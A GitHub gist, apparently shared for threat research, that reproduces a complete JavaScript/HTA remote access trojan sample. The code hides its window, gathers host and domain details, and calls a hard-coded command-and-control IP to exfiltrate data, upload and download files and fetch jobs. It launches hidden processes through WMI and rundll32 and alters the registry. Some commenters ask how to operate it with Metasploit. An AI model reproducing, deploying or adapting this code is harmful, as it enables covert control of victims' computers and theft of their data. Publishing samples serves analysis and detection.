Skip to content

Instantly share code, notes, and snippets.

@JohnLaTwC

JohnLaTwC/JavaScript RAT

Created February 9, 2018 17:05
Show Gist options
  • Star 28 You must be signed in to star a gist
  • Fork 16 You must be signed in to fork a gist
  • Save JohnLaTwC/4315bbbd89da0996f5c08c032b391799 to your computer and use it in GitHub Desktop.
Save JohnLaTwC/4315bbbd89da0996f5c08c032b391799 to your computer and use it in GitHub Desktop.
Download ZIP
JavaScript RAT
Raw
JavaScript RAT
## uploaded by @JohnLaTwC
## sample hash: 1d37e2a657ccc595c7a5544df6fd2d35739455f3fdbc2d2700835873130befde
<html>
<head>
<script language="JScript">
window.resizeTo(1, 1);
window.moveTo(-2000, -2000);
window.blur();
try
{
window.onfocus = function() { window.blur(); }
window.onerror = function(sMsg, sUrl, sLine) { return false; }
}
catch (e){}
var JPTUDBSTOW =
{
FS : new ActiveXObject("Scripting.FileSystemObject"),
WS : new ActiveXObject("WScript.Shell"),
STAGER : "http://104.238.179.183:9999/hoVgt",
SESSIONKEY : "bd19aa8e9b4a40ab9db982f82775fc8c",
JOBKEY : "",
JOBKEYPATH : "http://104.238.179.183:9999/hoVgt?sid=bd19aa8e9b4a40ab9db982f82775fc8c;csrf="
};
/**
* Sleeps the current thread
*
* @param int ms - how long to sleep in milliseconds
* @param function callback - where to continue execution after the sleep
*
* @return void
*/
JPTUDBSTOW.sleep = function(ms, callback)
{
if (JPTUDBSTOW.isHTA())
{
window.setTimeout(callback, ms);
}
else
{
var now = new Date().getTime();
while (new Date().getTime() < now + ms);
callback();
}
}
/**
* Attempts to kill the current process using a myriad of methods
*
* @return void
*/
JPTUDBSTOW.exit = function()
{
if (JPTUDBSTOW.isHTA())
{
// crappy hack?
try {
window.close();
} catch(e){}
try {
window.self.close();
} catch (e){}
try {
window.top.close();
} catch (e){}
try{
self.close();
} catch (e){}
try
{
window.open('', '_self', '');
window.close();
}
catch (e)
{
}
}
try
{
WScript.quit();
}
catch (e)
{
}
try
{
var pid = JPTUDBSTOW.process.currentPID();
JPTUDBSTOW.process.kill(pid);
}
catch (e)
{
}
}
/**
* Determine if running in HTML Application context
*
* @return bool - true if HTML application context
*/
JPTUDBSTOW.isHTA = function()
{
return typeof(window) !== "undefined";
}
/**
* Determine if running in WScript Application context
*
* @return bool - true if WScript context
*/
JPTUDBSTOW.isWScript = function()
{
return typeof(WScript) !== "undefined";
}
JPTUDBSTOW.user = {};
JPTUDBSTOW.user.isElevated = function()
{
try
{
JPTUDBSTOW.WS.RegRead("HKEY_USERS\\s-1-5-19\\");
return true;
}
catch(e)
{
return false;
}
}
JPTUDBSTOW.user.OS = function()
{
try
{
var wmi = GetObject("winmgmts:\\\\.\\root\\CIMV2");
var colItems = wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem");
var enumItems = new Enumerator(colItems);
var objItem = enumItems.item();
return objItem.Caption;
}
catch(e){}
return "Unknown";
}
JPTUDBSTOW.user.DC = function()
{
try
{
var DC = JPTUDBSTOW.WS.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");
if (DC.length > 0)
return DC;
}
catch(e)
{
}
return "Unknown";
}
JPTUDBSTOW.user.Arch = function()
{
try
{
var wmi = GetObject("winmgmts:\\\\.\\root\\CIMV2");
var colItems = wmi.ExecQuery("SELECT * FROM Win32_OperatingSystem");
var enumItems = new Enumerator(colItems);
var objItem = enumItems.item();
return objItem.OSArchitecture;
}
catch(e){}
return "Unknown";
}
JPTUDBSTOW.user.CWD = function()
{
try
{
cwd = JPTUDBSTOW.shell.exec("cd", "%TEMP%\\cwd.txt");
return cwd;
}
catch(e)
{}
return "";
}
JPTUDBSTOW.user.info = function()
{
var net = new ActiveXObject("WScript.Network");
var info = net.UserDomain + "\\" + net.Username;
if (JPTUDBSTOW.user.isElevated())
info += "*";
info += "~~~" + net.ComputerName;
info += "~~~" + JPTUDBSTOW.user.OS();
info += "~~~" + JPTUDBSTOW.user.DC();
info += "~~~" + JPTUDBSTOW.user.Arch();
info += "~~~" + JPTUDBSTOW.user.CWD();
return info;
}
JPTUDBSTOW.work = {};
/*
JPTUDBSTOW.work.applyDefaultHeaders = function(headers)
{
var headers = (typeof(headers) !== "undefined") ? headers : {};
headers["SESSIONKEY"] = JPTUDBSTOW.SESSIONKEY;
headers["JOBKEY"] = JPTUDBSTOW.JOBKEY;
}
*/
/**
* Reports a successful message to the stager
*
* @param string data - The post body
* @param map headers - Any additional HTTP headers
*
* @return object - the HTTP object
*/
JPTUDBSTOW.work.report = function(data, headers)
{
//var headers = JPTUDBSTOW.work.applyDefaultHeaders(headers);
return JPTUDBSTOW.http.post(JPTUDBSTOW.work.make_url(), data, headers);
}
/**
* Reports an error condition to the stager
*
* @param exception e - what exception was thrown
*
* @return object - the HTTP object
*/
JPTUDBSTOW.work.error = function(e)
{
try
{
var headers = {};
headers["errno"] = (e.number) ? e.number : "-1";
headers["errname"] = (e.name) ? e.name : "Unknown";
headers["errdesc"] = (e.description) ? e.description : "Unknown";
return JPTUDBSTOW.work.report(e.message, headers);
}
catch (e)
{
// Abandon all hope ye who enter here
// For this is where all things are left behind
}
}
/**
* Makes the stager callhome URL for a specific jobkey
*
* @param string jobkey - which job to fetch
*
* @return string - the stager callhome URL
*/
JPTUDBSTOW.work.make_url = function(jobkey)
{
var jobkey = (typeof(jobkey) !== "undefined") ? jobkey : JPTUDBSTOW.JOBKEY;
return JPTUDBSTOW.JOBKEYPATH + jobkey + ";";
}
/**
* Fetches the next job from the server
*
* @return object - the HTTP object
*/
JPTUDBSTOW.work.get = function()
{
var url = JPTUDBSTOW.work.make_url();
return JPTUDBSTOW.http.post(url);
}
/**
* Forks a new process and runs the specific jobkey
*
* @param string jobkey - the job to fetch/run
* @param bool fork32Bit - ensure new process is x86
*
* @return void
*/
JPTUDBSTOW.work.fork = function(jobkey, fork32Bit)
{
var fork32Bit = (typeof(fork32Bit) !== "undefined") ? fork32Bit : false;
var cmd = "rundll32.exe ***K***\\..\\..\\..\\mshtml,RunHTMLApplication";
if (fork32Bit)
cmd = JPTUDBSTOW.file.get32BitFolder() + cmd;
cmd = cmd.replace("***K***", JPTUDBSTOW.work.make_url(jobkey));
JPTUDBSTOW.WMI.createProcess(cmd);
//JPTUDBSTOW.WS.Run(cmd, 0, false);
}
JPTUDBSTOW.http = {};
JPTUDBSTOW.http.create = function()
{
var http = null;
try
{
http = new ActiveXObject("Microsoft.XMLHTTP");
}
catch (e)
{
http = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
http.setTimeouts(30000, 30000, 30000, 0)
}
return http;
}
JPTUDBSTOW.http.addHeaders = function(http, headers)
{
var headers = (typeof(headers) !== "undefined") ? headers : {};
var content = false;
for (var key in headers)
{
var value = headers[key];
http.setRequestHeader(key, value);
if (key.toUpperCase() == "CONTENT-TYPE")
content = true;
}
if (!content)
http.setRequestHeader("Content-Type", "application/octet-stream");
}
JPTUDBSTOW.http.post = function(url, data, headers)
{
var data = (typeof(data) !== "undefined") ? data : "";
var http = JPTUDBSTOW.http.create();
http.open("POST", url, false);
JPTUDBSTOW.http.addHeaders(http, headers);
http.send(data);
return http;
}
JPTUDBSTOW.http.get = function(url, headers)
{
var http = JPTUDBSTOW.http.create();
http.open("GET", url, false);
JPTUDBSTOW.http.addHeaders(http, headers);
http.send();
return http;
}
/**
* Upload a file, off zombie, to stager
*
* @param filepath - the full path to the file to send
* @param header_uuid - a unique identifier for this file
* @param header_key - optional HTTP header tag to send uuid over
*
* @return object - the HTTP object
*
**/
JPTUDBSTOW.http.upload = function(filepath, header_uuid, header_key)
{
var key = (typeof(header_key) !== "undefined") ? header_key : "ETag";
var data = JPTUDBSTOW.file.readBinary(filepath);
// we must replace null bytes or MS will cut off the body
data = data.replace(/\\/g, "\\\\");
data = data.replace(/\0/g, "\\0");
var headers = {};
headers[key] = header_uuid;
return JPTUDBSTOW.work.report(data, headers);
}
JPTUDBSTOW.http.download = function(filepath, header_uuid, header_key)
{
var key = (typeof(header_key) !== "undefined") ? header_key : "ETag";
var headers = {};
headers[key] = header_uuid;
return JPTUDBSTOW.http.downloadEx("POST", JPTUDBSTOW.work.make_url(), headers, filepath);
}
JPTUDBSTOW.http.downloadEx = function(verb, url, headers, path)
{
if (verb == "GET")
{
var http = JPTUDBSTOW.http.get(url, headers);
}
else
{
var http = JPTUDBSTOW.http.post(url, "", headers);
}
var stream = new ActiveXObject("Adodb.Stream");
stream.Type = 1;
stream.Open();
stream.Write(http.responseBody);
var data = JPTUDBSTOW.http.bin2str(stream);
JPTUDBSTOW.file.write(path, data);
}
JPTUDBSTOW.http.bin2str = function(stream)
{
stream.Flush();
stream.Position = 0;
var bin = stream.Read();
var rs = new ActiveXObject("Adodb.RecordSet");
rs.Fields.Append("temp", 201, stream.Size);
rs.Open();
rs.AddNew();
rs("temp").AppendChunk(bin);
rs.Update();
var data = rs.GetString();
rs.Close();
return data.substring(0, data.length - 1);
}
JPTUDBSTOW.process = {};
JPTUDBSTOW.process.currentPID = function()
{
var cmd = JPTUDBSTOW.file.getPath("%comspec% /K hostname");
//JPTUDBSTOW.WS.Run(cmd, 0, false);
var childPid = JPTUDBSTOW.WMI.createProcess(cmd);
var pid = -1;
// there could be a race condition, but CommandLine returns null on win2k
// and is often null on later windows with more harsh privileges
// todo: this method is stupid. instead of using .Run, spawn a WMI process.
// then we get child PID for free and can backtrack PPID, no race condition
var latestTime = 0;
var latestProc = null;
var processes = JPTUDBSTOW.process.list();
var items = new Enumerator(processes);
while (!items.atEnd())
{
var proc = items.item();
try
{
/*
if (proc.Name.indexOf("cmd") != -1)
{
if (latestTime == 0 && proc.CreationDate)
latestTime = proc.CreationDate;
if (proc.CreationDate > latestTime)
{
latestTime = proc.CreationDate;
latestProc = proc;
}
}
*/
if (proc.ProcessId == childPid)
{
latestProc = proc;
break;
}
} catch (e)
{
}
items.moveNext();
}
pid = latestProc.ParentProcessId;
latestProc.Terminate();
return pid;
}
JPTUDBSTOW.process.kill = function(pid)
{
var processes = JPTUDBSTOW.process.list();
var items = new Enumerator(processes);
while (!items.atEnd())
{
var proc = items.item();
try
{
if (proc.ProcessId == pid)
{
proc.Terminate();
return true;
}
} catch (e)
{
}
items.moveNext();
}
return false;
}
JPTUDBSTOW.process.list = function()
{
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2");
var query = "Select * From Win32_Process";
return wmi.ExecQuery(query);
}
// http://apidock.com/ruby/Win32/Registry/Constants
JPTUDBSTOW.registry = {};
JPTUDBSTOW.registry.HKCR = 0x80000000;
JPTUDBSTOW.registry.HKCU = 0x80000001;
JPTUDBSTOW.registry.HKLM = 0x80000002;
JPTUDBSTOW.registry.STRING = 0;
JPTUDBSTOW.registry.BINARY = 1;
JPTUDBSTOW.registry.DWORD = 2;
JPTUDBSTOW.registry.QWORD = 3;
JPTUDBSTOW.registry.provider = function(computer)
{
var computer = (typeof(computer) !== "undefined") ? computer : ".";
var reg = GetObject("winmgmts:\\\\" + computer + "\\root\\default:StdRegProv");
return reg;
}
JPTUDBSTOW.registry.write = function(hKey, path, key, value, valType, computer)
{
var reg = JPTUDBSTOW.registry.provider(computer);
reg.CreateKey(hKey, path);
if (valType == JPTUDBSTOW.registry.STRING)
reg.SetStringValue(hKey, path, key, value);
else if (valType == JPTUDBSTOW.registry.DWORD)
reg.SetDWORDValue(hKey, path, key, value);
else if (valType == JPTUDBSTOW.registry.QWORD)
reg.SetQWORDValue(hKey, path, key, value);
else if (valType == JPTUDBSTOW.registry.BINARY)
reg.SetBinaryValue(hKey, path, key, value);
}
JPTUDBSTOW.registry.read = function(hKey, path, key, valType, computer)
{
var reg = JPTUDBSTOW.registry.provider(computer);
var methodName = "";
if (valType == JPTUDBSTOW.registry.STRING)
methodName = "GetStringValue";
else if (valType == JPTUDBSTOW.registry.DWORD)
methodName = "GetDWORDValue";
else if (valType == JPTUDBSTOW.registry.QWORD)
methodName = "GetQWORDValue";
else if (valType == JPTUDBSTOW.registry.BINARY)
methodName = "GetBinaryValue";
if (methodName == "")
return;
var method = reg.Methods_.Item(methodName);
var inparams = method.InParameters.SpawnInstance_();
inparams.hDefKey = hKey;
inparams.sSubKeyName = path;
inparams.sValueName = key;
var outparams = reg.ExecMethod_(method.Name, inparams);
return outparams;
}
JPTUDBSTOW.registry.destroy = function(hKey, path, key, computer)
{
var reg = JPTUDBSTOW.registry.provider(computer);
var loc = (key == "") ? path : path + "\\" + key;
return reg.DeleteKey(hKey, loc);
}
/*
// DEPRECATED
JPTUDBSTOW.registry.create = function(hiveKey, path, key, computer)
{
var computer = (typeof(computer) !== "undefined") ? computer : ".";
var sw = new ActiveXObject("WbemScripting.SWbemLocator");
var root = sw.ConnectServer(computer, "root\\default");
var reg = root.get("StdRegProv");
var enumKey = reg.Methods_.Item("EnumKey");
var inParams = enumKey.InParameters.SpawnInstance_();
inParams.hDefKey = hiveKey;
inParams.sSubKeyName = path;
var outParam = reg.ExecMethod_(enumKey.Name, inParams);
if (outParam.ReturnValue != 0)
return false;
if (outParam.sNames)
{
var subKeys = outParam.sNames.toArray();
for (var i = 0; i < subKeys.length; ++i)
{
if (subkeys[i].toUpperCase() == key.toUpperCase())
return true;
}
}
var createKey = reg.Methods_.Item("CreateKey");
var createArgs = createKey.InParameters.SpawnInstance_();
createArgs.hDefKey = hiveKey;
createArgs.sSubKeyName = path + "\\" + key;
var createRet = reg.ExecMethod_(createKey.Name, createArgs);
return createRet.returnValue == 0;
}
*/
JPTUDBSTOW.WMI = {};
JPTUDBSTOW.WMI.createProcess = function(cmd)
{
var SW_HIDE = 0;
var pid = 0;
var wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\cimv2")
var si = wmi.Get("Win32_ProcessStartup").SpawnInstance_();
si.ShowWindow = SW_HIDE;
si.CreateFlags = 16777216;
si.X = si.Y = si.XSize = si.ySize = 1;
//wmi.Get("Win32_Process").Create(cmd, null, si, pid);
var w32proc = wmi.Get("Win32_Process");
var method = w32proc.Methods_.Item("Create");
var inParams = method.InParameters.SpawnInstance_();
inParams.CommandLine = cmd;
inParams.CurrentDirectory = null;
inParams.ProcessStartupInformation = si;
var outParams = w32proc.ExecMethod_("Create", inParams);
return outParams.ProcessId;
}
JPTUDBSTOW.shell = {};
JPTUDBSTOW.shell.exec = function(cmd, stdOutPath)
{
var c = "%comspec% /q /c " + cmd + " 1> " + JPTUDBSTOW.file.getPath(stdOutPath);
c += " 2>&1";
JPTUDBSTOW.WS.Run(c, 0, true);
var data = JPTUDBSTOW.file.readText(stdOutPath);
JPTUDBSTOW.file.deleteFile(stdOutPath);
return data;
}
JPTUDBSTOW.shell.run = function(cmd, fork)
{
var fork = (typeof(fork) !== "undefined") ? fork : true;
var c = "%comspec% /q /c " + cmd;
JPTUDBSTOW.WS.Run(cmd, 0, !fork);
}
JPTUDBSTOW.file = {};
JPTUDBSTOW.file.getPath = function(path)
{
return JPTUDBSTOW.WS.ExpandEnvironmentStrings(path);
}
/**
* @return string - the system folder with x86 binaries
*/
JPTUDBSTOW.file.get32BitFolder = function()
{
var base = JPTUDBSTOW.file.getPath("%WINDIR%");
var syswow64 = base + "\\SysWOW64\\";
if (JPTUDBSTOW.FS.FolderExists(syswow64))
return syswow64;
return base + "\\System32\\";
}
JPTUDBSTOW.file.readText = function(path)
{
var loopcount = 0;
while(true)
{
if (JPTUDBSTOW.FS.FileExists(JPTUDBSTOW.file.getPath(path)) && JPTUDBSTOW.FS.GetFile(JPTUDBSTOW.file.getPath(path)).Size > 0)
{
var fd = JPTUDBSTOW.FS.OpenTextFile(JPTUDBSTOW.file.getPath(path), 1, false, 0);
var data = fd.ReadAll();
fd.Close();
return data;
}
else
{
loopcount += 1;
if (loopcount > 180)
{
return "";
}
JPTUDBSTOW.shell.run("ping 127.0.0.1 -n 2", false);
}
}
}
JPTUDBSTOW.file.readBinary = function(path)
{
var fp = JPTUDBSTOW.FS.GetFile(JPTUDBSTOW.file.getPath(path));
var fd = fp.OpenAsTextStream();
var data = fd.read(fp.Size);
fd.close();
return data;
}
JPTUDBSTOW.file.write = function(path, data)
{
var fd = JPTUDBSTOW.FS.CreateTextFile(JPTUDBSTOW.file.getPath(path), true);
fd.write(data);
fd.close();
}
JPTUDBSTOW.file.deleteFile = function(path)
{
JPTUDBSTOW.FS.DeleteFile(JPTUDBSTOW.file.getPath(path), true);
};try
{
if (JPTUDBSTOW.JOBKEY != "stage")
{
if (JPTUDBSTOW.isHTA())
{
//HKCU\SOFTWARE\Microsoft\Internet Explorer\Style\MaxScriptStatements = 0xFFFFFFFF
var path = "SOFTWARE\\Microsoft\\Internet Explorer\\Styles";
var key = "MaxScriptStatements";
JPTUDBSTOW.registry.write(JPTUDBSTOW.registry.HKCU, path, key, 0xFFFFFFFF, JPTUDBSTOW.registry.DWORD);
}
JPTUDBSTOW.work.report(JPTUDBSTOW.user.info());
JPTUDBSTOW.work.fork("");
JPTUDBSTOW.exit();
}
else
{
if (JPTUDBSTOW.isHTA())
DoWorkTimeout();
else
DoWorkLoop();
}
}
catch (e)
{
// todo: critical error reporting
}
function DoWork()
{
try
{
var work = JPTUDBSTOW.work.get();
// 201 = x64 or x86
// 202 = force x86
if (work.status == 201 || work.status == 202)
{
if (work.responseText.length > 0) {
var jobkey = work.responseText;
JPTUDBSTOW.work.fork(jobkey, work.status == 202);
}
}
else // if (work.status == 500) // kill code
{
return false;
}
}
catch (e)
{
return false;
}
return true;
}
function DoWorkLoop()
{
while (DoWork())
;
JPTUDBSTOW.exit();
}
function DoWorkTimeout()
{
for (var i = 0; i < 10; ++i)
{
if (!DoWork())
{
JPTUDBSTOW.exit();
return;
}
}
//window.setTimeout(DoWorkTimeoutCallback, 0);
JPTUDBSTOW.work.fork("");
JPTUDBSTOW.exit();
}
</script>
<hta:application caption="no" showInTaskBar="no" windowState="minimize"
navigable="no" scroll="no" />
<!-- -->
</head>
<body>
</body>
</html>
@GetRektBoy724
Copy link

How to control it with metasploit and how to setup this code?

@GetRektBoy724
Copy link

How to control it with metasploit and how to setup this code?

@rodneymullen3
Copy link

rodneymullen3 commented Feb 7, 2020
edited

crazy this is still used in 2020..

@gBasil
Copy link

gBasil commented Sep 2, 2020

is it?

@mikebush92
Copy link

just seen it used in 2022

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment